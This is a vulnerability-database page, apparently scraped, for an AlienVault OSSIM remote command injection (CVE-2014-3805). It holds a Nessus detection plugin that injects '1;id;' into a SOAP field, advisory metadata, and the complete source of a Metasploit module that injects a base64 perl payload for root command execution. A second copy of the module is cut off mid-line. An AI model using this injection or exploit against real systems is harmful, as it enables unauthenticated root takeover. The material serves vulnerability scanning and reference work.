ID OSSIM_SOAP_4_7_0.NASL Type nessus Reporter This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2022-04-11T00:00:00
Description
The remote host is running a version of AlienVault Open Source Security Information Management (OSSIM) that is affected by a remote code execution vulnerability in the 'av-centerd' SOAP service due to a failure to sanitize user input to the 'get_log_line' method. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with root privileges.
Note that this version is reportedly also affected by other remote code execution vulnerabilities as well as a SQL injection issue.
However, Nessus did not test for these additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
  # Plugin identity and revision.
  script_id(76193);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  # External identifiers for the flaw this plugin checks.
  script_cve_id("CVE-2014-3805");
  script_bugtraq_id(67998);

  script_name(english:"AlienVault OSSIM 'av-centerd' Remote Code Execution");

  # Findings text shown in the report.
  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of AlienVault Open Source
Security Information Management (OSSIM) that is affected by a remote
code execution vulnerability in the 'av-centerd' SOAP service due to a
failure to sanitize user input to the 'get_log_line' method. A remote,
unauthenticated attacker can exploit this vulnerability to execute
arbitrary code with root privileges.
Note that this version is reportedly also affected by other remote
code execution vulnerabilities as well as a SQL injection issue.
However, Nessus did not test for these additional issues.");
  script_set_attribute(attribute:"solution", value:
"Upgrade to 4.7.0 or later.");
  script_set_attribute(attribute:"see_also", value:"http://forums.alienvault.com/discussion/2690");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-14-199/");

  # Scoring: network-reachable, no authentication, complete C/I/A impact;
  # temporal vector records a public PoC and an official fix.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # Timeline: vendor fix, public disclosure, plugin release.
  script_set_attribute(attribute:"patch_publication_date", value:"2014/05/06");
  script_set_attribute(attribute:"vuln_publication_date", value:"2014/06/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/23");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:alienvault:open_source_security_information_management");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the check below makes the target run a command ('id'),
  # it is not a passive version comparison.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Depends on the SOAP detection plugin and the port it records in the KB.
  script_dependencies("ossim_soap_detect.nbin");
  script_require_ports("www/AlienVault OSSIM 'av-centerd' SOAP Service");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
# Wrap a SOAP body (and optional header) in a SOAP 1.1 envelope.
#
# tag         : namespace prefix used for the envelope elements (default "soapenv")
# header      : optional markup placed inside <tag:Header>, inserted verbatim
# body        : markup placed inside <tag:Body>, inserted verbatim
# schema_year : year component of the XML Schema namespace URIs (default "2001")
#
# Returns the envelope as a string, or NULL when no body was given.
# No XML escaping is performed on header or body; the caller must supply
# well-formed markup.
function _soap_create_request(tag, header, body, schema_year)
{
  local_var ns, year, nl, envelope;

  # No body means no request.
  if (isnull(body)) return NULL;

  year = schema_year;
  if (isnull(year)) year = "2001";

  ns = tag;
  if (isnull(ns)) ns = "soapenv";

  nl = '\n';

  # Envelope opening tag, one namespace declaration per line.
  envelope =
    '<?xml version="1.0" encoding="utf-8"?>' + nl +
    '<' + ns + ':Envelope ' + ns + ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"' + nl +
    'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"' + nl +
    'xmlns:xsi="http://www.w3.org/' + year + '/XMLSchema-instance"' + nl +
    'xmlns:' + ns + '="http://schemas.xmlsoap.org/soap/envelope/"' + nl +
    'xmlns:xsd="http://www.w3.org/' + year + '/XMLSchema">';

  # Optional header block.
  if (!isnull(header))
    envelope += '<' + ns + ':Header>' + header + '</' + ns + ':Header>';

  # Body, then close the envelope.
  envelope +=
    '<' + ns + ':Body>' + body + '</' + ns + ':Body>' + nl +
    '</' + ns + ':Envelope>';

  return envelope;
}
# POST a SOAP request to the given URL and return the raw HTTP result.
#
# soap_action  : value of the SOAPAction header
# url          : request path
# port         : target port
# soap_tag     : envelope namespace prefix (default "soapenv")
# soap_header  : optional SOAP header markup
# request      : SOAP body markup
# headers      : optional HTTP header array; when NULL a default
#                Content-type / User-Agent pair is used
# exit_on_fail : passed through to http_send_recv3()
#
# Returns whatever http_send_recv3() returns.
function soap_send_request(soap_action, url, port, soap_tag, soap_header, request, headers, exit_on_fail)
{
  local_var envelope_tag, hdrs, envelope;

  envelope_tag = soap_tag;
  if (isnull(envelope_tag)) envelope_tag = "soapenv";

  # Default HTTP headers, used only when the caller supplied none.
  hdrs = headers;
  if (isnull(hdrs))
  {
    hdrs = make_array(
      "Content-type", "application/soap+xml",
      "User-Agent", "Nessus SOAP v0.0.1 (Nessus.org)"
    );
  }
  # SOAPAction is always set, overriding any caller-supplied value.
  hdrs["SOAPAction"] = soap_action;

  envelope = _soap_create_request(tag:envelope_tag, header:soap_header, body:request);

  return http_send_recv3(
    method       : "POST",
    item         : url,
    port         : port,
    add_headers  : hdrs,
    data         : envelope,
    exit_on_fail : exit_on_fail
  );
}
app_name = "AlienVault OSSIM 'av-centerd' SOAP Service";
# Port recorded in the KB by the detection plugin; exits if absent.
port = get_kb_item_or_exit('www/' + app_name);

# SOAP method under test and the SOAPAction value built from it.
method = 'get_log_line';
method_namespace = 'AV/CC/Util';
soap_action = strcat(method_namespace, '#', method);
url = "/av-centerd";

# Positional arguments of get_log_line. The last one is the log line
# count; before 4.7.0 the executing perl script does not pass it through
# int(), so a trailing 'id' command is enough to distinguish a vulnerable
# build from a fixed one.
request =
  '<m:' + method + ' xmlns:m="' + method_namespace + '">\n' +
  '<string>All</string>\n' +
  '<string>423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</string>\n' +
  '<string>' + unixtime() + '</string>\n' +
  '<string>' + SCRIPT_NAME + '</string>\n' +
  '<string>/var/log/auth.log</string>\n' +
  '<string>1;id;</string>\n' +
  '</m:' + method + '>';

# exit_on_fail:TRUE is passed down to http_send_recv3(), which is expected
# to exit on transport failure, so the response body is used unguarded.
soap_response = soap_send_request(
  soap_action  : soap_action,
  url          : url,
  port         : port,
  request      : request,
  exit_on_fail : TRUE);

# The only accepted evidence is a uid= line inside an <item> element of
# the response; anything else is reported as not vulnerable.
uid_pattern = ">\s*(uid=.*)\s*</item";
found = eregmatch(string:soap_response[2], pattern:uid_pattern);
if (isnull(found)) audit(AUDIT_LISTEN_NOT_VULN, app_name, port);

if (report_verbosity > 0)
{
  rule = crap(data:'-', length:30) + " request " + crap(data:'-', length:30);
  # The captured uid line goes through the data-protection sanitizer
  # before it is written to the report.
  report =
    '\nNessus executed "id" by sending the following request :\n\n' +
    rule + '\n' +
    chomp(http_last_sent_request()) + '\n' +
    rule + '\n\n' +
    'Which resulted in the following command output :\n\n' +
    data_protection::sanitize_uid(output:found[1]);
  security_hole(port:port, extra:report);
}
else security_hole(port);
{"id": "OSSIM_SOAP_4_7_0.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "AlienVault OSSIM 'av-centerd' Remote Code Execution", "description": "The remote host is running a version of AlienVault Open Source Security Information Management (OSSIM) that is affected by a remote code execution vulnerability in the 'av-centerd' SOAP service due to a failure to sanitize user input to the 'get_log_line' method. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with root privileges.\n\nNote that this version is reportedly also affected by other remote code execution vulnerabilities as well as a SQL injection issue.\nHowever, Nessus did not test for these additional issues.", "published": "2014-06-23T00:00:00", "modified": "2022-04-11T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/76193", "reporter": "This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://forums.alienvault.com/discussion/2690", "https://www.zerodayinitiative.com/advisories/ZDI-14-199/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3805"], "cvelist": ["CVE-2014-3805"], "immutableFields": [], "lastseen": "2022-04-16T14:05:04", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1722"]}, {"type": "cve", "idList": ["CVE-2014-3804", "CVE-2014-3805", "CVE-2014-5210"]}, {"type": "exploitdb", "idList": ["EDB-ID:33805"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F65030A33A46E083528FF901D4F0FE37"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105048"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144161"]}, {"type": "seebug", "idList": ["SSV:86990"]}, {"type": "zdi", "idList": ["ZDI-14-198", "ZDI-14-199", "ZDI-14-204"]}, {"type": "zdt", "idList": ["1337DAY-ID-28537"]}]}, "score": {"value": 9.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1722"]}, {"type": "cve", "idList": ["CVE-2014-3805"]}, {"type": "nessus", "idList": ["OSSIM_SOAP_DETECT.NBIN"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813197"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144161"]}, {"type": "seebug", "idList": ["SSV:86990"]}, {"type": "zdi", "idList": ["ZDI-14-204"]}]}, "exploitation": null, "vulnersScore": 9.2}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "76193", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76193);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-3805\");\n script_bugtraq_id(67998);\n\n script_name(english:\"AlienVault OSSIM 'av-centerd' Remote Code Execution\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of AlienVault Open Source\nSecurity Information Management (OSSIM) that is affected by a remote\ncode execution vulnerability in the 'av-centerd' SOAP service due to a\nfailure to sanitize user input to the 'get_log_line' method. A remote,\nunauthenticated attacker can exploit this vulnerability to execute\narbitrary code with root privileges.\n\nNote that this version is reportedly also affected by other remote\ncode execution vulnerabilities as well as a SQL injection issue.\nHowever, Nessus did not test for these additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.alienvault.com/discussion/2690\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-199/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to 4.7.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:alienvault:open_source_security_information_management\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ossim_soap_detect.nbin\");\n script_require_ports(\"www/AlienVault OSSIM 'av-centerd' SOAP Service\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nfunction _soap_create_request(tag, header, body, schema_year)\n{\n local_var request;\n\n if (isnull(body))\n return NULL;\n\n if (isnull(schema_year))\n schema_year = \"2001\";\n\n if (isnull(tag))\n tag = \"soapenv\";\n\n request =\n '<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <' + tag + ':Envelope ' + tag + ':encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\n xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\n xmlns:xsi=\"http://www.w3.org/' + schema_year + '/XMLSchema-instance\"\n xmlns:' + tag + '=\"http://schemas.xmlsoap.org/soap/envelope/\"\n xmlns:xsd=\"http://www.w3.org/' + schema_year + '/XMLSchema\">';\n\n if (!isnull(header))\n request += '<' + tag + ':Header>' + header + '</' + tag + ':Header>';\n\n request +=\n '<' + tag + ':Body>' +\n body +\n '</' + tag + ':Body>\n </' + tag + ':Envelope>';\n\n return request;\n}\n\nfunction soap_send_request(soap_action, url, port, soap_tag, soap_header, request, headers, exit_on_fail)\n{\n local_var result;\n\n if (isnull(soap_tag))\n soap_tag = \"soapenv\";\n\n if (isnull(headers))\n {\n headers = make_array(\n \"Content-type\", \"application/soap+xml\",\n \"User-Agent\", \"Nessus SOAP v0.0.1 (Nessus.org)\"\n );\n }\n\n headers[\"SOAPAction\"] = soap_action;\n\n result = http_send_recv3(\n method : \"POST\",\n item : url,\n port : port,\n add_headers : headers,\n data : _soap_create_request(tag:soap_tag, header:soap_header, body:request),\n exit_on_fail : exit_on_fail\n );\n\n return result;\n}\n\napp_name = \"AlienVault OSSIM 'av-centerd' SOAP Service\";\nport = 
get_kb_item_or_exit('www/' + app_name);\n\nmethod = 'get_log_line';\nmethod_namespace = 'AV/CC/Util';\nsoap_action = strcat(method_namespace, '#', method);\nurl = \"/av-centerd\";\n\n# We append an 'id' command to the log line number, which prior to\n# 4.7.0 is not sanitized via int() in the executing perl script.\nrequest =\n'<m:' + method + ' xmlns:m=\"' + method_namespace + '\">\n <string>All</string>\n <string>423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</string>\n <string>' + unixtime() + '</string>\n <string>' + SCRIPT_NAME + '</string>\n <string>/var/log/auth.log</string>\n <string>1;id;</string>\n</m:' + method + '>';\n\nsoap_response =\n soap_send_request(\n soap_action:soap_action,\n url:url,\n port:port,\n request:request,\n exit_on_fail:TRUE);\n\n# Verify that 'id' command executed.\npattern = \">\\s*(uid=.*)\\s*</item\";\nmatch = eregmatch(string:soap_response[2], pattern:pattern);\nif (isnull(match)) audit(AUDIT_LISTEN_NOT_VULN, app_name, port);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n' + 'Nessus executed \"id\" by sending the following request :' +\n '\\n' +\n '\\n' + crap(data:'-', length:30) + \" request \" + crap(data:'-', length:30) +\n '\\n' + chomp(http_last_sent_request()) +\n '\\n' + crap(data:'-', length:30) + \" request \" + crap(data:'-', length:30) +\n '\\n' +\n '\\n' + 'Which resulted in the following command output :' +\n '\\n' +\n '\\n' + data_protection::sanitize_uid(output:match[1]);\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:alienvault:open_source_security_information_management"], "solution": "Upgrade to 4.7.0 or later.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2014-05-06T00:00:00", "vulnerabilityPublicationDate": "2014-06-11T00:00:00", "exploitableWith": []}
{"zdi": [{"lastseen": "2022-01-31T21:06:13", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault Ossim. Authentication is not required to exploit this vulnerability. The specific flaw exists within the av-centerd SOAP service. The issue lies in the handling of the get_license requests due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges.", "cvss3": {}, "published": "2014-06-11T00:00:00", "type": "zdi", "title": "AlienVault OSSIM av-centerd Util.pm get_license Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3805"], "modified": "2014-06-11T00:00:00", "id": "ZDI-14-204", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-204/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:06:16", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault Ossim. Authentication is not required to exploit this vulnerability. The specific flaw exists within the av-centerd SOAP service. The issue lies in the handling of the get_log_line requests due to a failure to safely sanitize user data before executing a command. 
An attacker could leverage this vulnerability to execute code with root privileges.", "cvss3": {}, "published": "2014-06-11T00:00:00", "type": "zdi", "title": "AlienVault OSSIM av-centerd Util.pm get_log_line Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3805"], "modified": "2014-06-11T00:00:00", "id": "ZDI-14-199", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-199/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:06:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault Ossim. Authentication is not required to exploit this vulnerability. The specific flaw exists within the av-centerd SOAP service. The issue lies in the handling of the update_system/upgrade_pro_web requests due to a failure to safely sanitize user data before executing a command. 
An attacker could leverage this vulnerability to execute code with root privileges.", "cvss3": {}, "published": "2014-06-11T00:00:00", "type": "zdi", "title": "AlienVault OSSIM av-centerd Util.pm update_system/upgrade_pro_web Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3805"], "modified": "2014-06-11T00:00:00", "id": "ZDI-14-198", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-198/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-09-15T10:22:50", "description": "", "cvss3": {}, "published": "2017-09-14T00:00:00", "type": "packetstorm", "title": "Alienvault OSSIM av-centerd 4.7.0 get_log_line Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-3805"], "modified": "2017-09-14T00:00:00", "id": "PACKETSTORM:144161", "href": "https://packetstormsecurity.com/files/144161/Alienvault-OSSIM-av-centerd-4.7.0-get_log_line-Command-Injection.html", "sourceData": "`require 'msf/core' \nrequire 'rexml/document' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude REXML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Alienvault OSSIM av-centerd Command Injection get_log_line', \n'Description' => %q{ \nThis module exploits a command injection flaw found in the get_log_line \nfunction found within Util.pm. 
The vulnerability is triggered due to an \nunsanitized $r_file parameter passed to a string which is then executed \nby the system \n}, \n'Author' => [ 'james fitts' ], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-3805' ], \n[ 'OSVDB', '107992' ] \n], \n'Privileged' => true, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => \n{ \n'SSL' => true, \n}, \n'Payload' => \n{ \n'Compat' => { \n'RequiredCmd' => 'perl netcat-e openssl python gawk' \n} \n}, \n'DefaultTarget' => 0, \n'Targets' => \n[ \n['Alienvault <= 4.7.0',{}] \n], \n'DisclosureDate' => 'Jul 18 2014')) \n \nregister_options([Opt::RPORT(40007)], self.class) \nend \n \ndef check \nversion = \"\" \nres = send_soap_request(\"get_dpkg\") \n \nif res && \nres.code == 200 && \nres.headers['SOAPServer'] && \nres.headers['SOAPServer'] =~ /SOAP::Lite/ && \nres.body.to_s =~ /alienvault-center\\s*([\\d\\.]*)-\\d/ \n \nversion = $1 \nend \n \nif version.empty? || version >= \"4.7.0\" \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \ndef build_soap_request(method) \nxml = Document.new \nxml.add_element( \n\"soap:Envelope\", \n{ \n\"xmlns:xsi\" => \"http://www.w3.org/2001/XMLSchema-instance\", \n\"xmlns:soapenc\" => \"http://schemas.xmlsoap.org/soap/encoding/\", \n\"xmlns:xsd\" => \"http://www.w3.org/2001/XMLSchema\", \n\"soap:encodingStyle\" => \"http://schemas.xmlsoap.org/soap/encoding/\", \n\"xmlns:soap\" => \"http://schemas.xmlsoap.org/soap/envelope/\" \n}) \n \nbody = xml.root.add_element(\"soap:Body\") \nm = body.add_element(method, { 'xmlns' => \"AV/CC/Util\" }) \n \nargs = [] \nargs[0] = m.add_element(\"c-gensym3\", {'xsi:type' => 'xsd:string'}) \nargs[0].text = \"All\" \n \nargs[1] = m.add_element(\"c-gensym5\", {'xsi:type' => 'xsd:string'}) \nargs[1].text = \"423d7bea-cfbc-f7ea-fe52-272ff7ede3d2\" \n \nargs[2] = m.add_element(\"c-gensym7\", {'xsi:type' => 'xsd:string'}) \nargs[2].text = \"#{datastore['RHOST']}\" \n \nargs[3] = 
m.add_element(\"c-gensym9\", {'xsi:type' => 'xsd:string'}) \nargs[3].text = \"#{rand_text_alpha(4 + rand(4))}\" \n \nargs[4] = m.add_element(\"c-gensym11\", {'xsi:type' => 'xsd:string'}) \nargs[4].text = \"/var/log/auth.log\" \n \nargs[5] = m.add_element(\"c-gensym13\", {'xsi:type' => 'xsd:string'}) \nperl_payload = \"system(decode_base64\" \nperl_payload += \"(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\"))\" \nargs[5].text = \"1;perl -MMIME::Base64 -e '#{perl_payload}';\" \n \nxml.to_s \nend \n \ndef send_soap_request(method, timeout=20) \nsoap = build_soap_request(method) \n \nres = send_request_cgi({ \n'uri' => '/av-centerd', \n'method' => 'POST', \n'ctype' => 'text/xml; charset=UTF-8', \n'data' => soap, \n'headers' => { \n'SOAPAction' => \"\\\"AV/CC/Util##{method}\\\"\" \n} \n}, timeout) \n \nres \nend \n \ndef exploit \nsend_soap_request(\"get_log_line\", 1) \nend \nend \n__END__ \n \n/usr/share/alienvault-center/lib/AV/CC/Util.pm \n \nsub get_log_line { \nmy ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines ) \n= @_; \n \nverbose_log_file( \n\"GET LOG LINE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)\" \n); \n \nmy @ret = (\"$systemuuid\"); \n \nif ( $r_file =~ /\\.\\./ ){ \npush(@ret,\"File not auth\"); \nreturn \\@ret; \n} \n \nif ( $number_lines <= 0) { \npush(@ret,\"Error in number lines\"); \nreturn \\@ret; \n} \n \nif (( $r_file =~ /^\\/var\\/log\\// ) or ( $r_file =~ /^\\/var\\/ossec\\/alerts\\// ) or ( $r_file =~ /^\\/var\\/ossec\\/logs\\// )){ \nif (! 
-f \"$r_file\" ){ \npush(@ret,\"File not found\"); \nreturn \\@ret; \n} \npush(@ret,\"ready\"); \n \nmy $command = \"tail -$number_lines $r_file\"; \n#push(@ret,\"$command\"); \n#my @content = `tail -$number_lines $r_file`; \nmy @content = `$command`; \npush(@ret,@content); \nreturn \\@ret; \n} \nelse { \npush(@ret,\"path not auth\"); \nreturn \\@ret; \n} \n} \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144161/alientvaultossim470-exec.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-09T11:40:49", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2017-09-13T00:00:00", "type": "zdt", "title": "Alienvault OSSIM av-centerd 4.7.0 - (get_log_line) Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-3805"], "modified": "2017-09-13T00:00:00", "id": "1337DAY-ID-28537", "href": "https://0day.today/exploit/description/28537", "sourceData": "require 'msf/core'\r\nrequire 'rexml/document'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include REXML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Alienvault OSSIM av-centerd Command Injection get_log_line',\r\n 'Description' => %q{\r\n This module exploits a command injection flaw found in the get_log_line\r\n function found within Util.pm. 
The vulnerability is triggered due to an\r\n unsanitized $r_file parameter passed to a string which is then executed\r\n by the system\r\n },\r\n 'Author' => [ 'james fitts' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-3805' ],\r\n [ 'OSVDB', '107992' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n },\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'RequiredCmd' => 'perl netcat-e openssl python gawk'\r\n }\r\n },\r\n 'DefaultTarget' => 0,\r\n 'Targets' =>\r\n [\r\n ['Alienvault <= 4.7.0',{}]\r\n ],\r\n 'DisclosureDate' => 'Jul 18 2014'))\r\n \r\n register_options([Opt::RPORT(40007)], self.class)\r\n end\r\n \r\n def check\r\n version = \"\"\r\n res = send_soap_request(\"get_dpkg\")\r\n \r\n if res &&\r\n res.code == 200 &&\r\n res.headers['SOAPServer'] &&\r\n res.headers['SOAPServer'] =~ /SOAP::Lite/ &&\r\n res.body.to_s =~ /alienvault-center\\s*([\\d\\.]*)-\\d/\r\n \r\n version = $1\r\n end\r\n \r\n if version.empty? 
|| version >= \"4.7.0\"\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n \r\n def build_soap_request(method)\r\n xml = Document.new\r\n xml.add_element(\r\n \"soap:Envelope\",\r\n {\r\n \"xmlns:xsi\" => \"http://www.w3.org/2001/XMLSchema-instance\",\r\n \"xmlns:soapenc\" => \"http://schemas.xmlsoap.org/soap/encoding/\",\r\n \"xmlns:xsd\" => \"http://www.w3.org/2001/XMLSchema\",\r\n \"soap:encodingStyle\" => \"http://schemas.xmlsoap.org/soap/encoding/\",\r\n \"xmlns:soap\" => \"http://schemas.xmlsoap.org/soap/envelope/\"\r\n })\r\n \r\n body = xml.root.add_element(\"soap:Body\")\r\n m = body.add_element(method, { 'xmlns' => \"AV/CC/Util\" })\r\n \r\n args = []\r\n args[0] = m.add_element(\"c-gensym3\", {'xsi:type' => 'xsd:string'})\r\n args[0].text = \"All\"\r\n \r\n args[1] = m.add_element(\"c-gensym5\", {'xsi:type' => 'xsd:string'})\r\n args[1].text = \"423d7bea-cfbc-f7ea-fe52-272ff7ede3d2\"\r\n \r\n args[2] = m.add_element(\"c-gensym7\", {'xsi:type' => 'xsd:string'})\r\n args[2].text = \"#{datastore['RHOST']}\"\r\n \r\n args[3] = m.add_element(\"c-gensym9\", {'xsi:type' => 'xsd:string'})\r\n args[3].text = \"#{rand_text_alpha(4 + rand(4))}\"\r\n \r\n args[4] = m.add_element(\"c-gensym11\", {'xsi:type' => 'xsd:string'})\r\n args[4].text = \"/var/log/auth.log\"\r\n \r\n args[5] = m.add_element(\"c-gensym13\", {'xsi:type' => 'xsd:string'})\r\n perl_payload = \"system(decode_base64\"\r\n perl_payload += 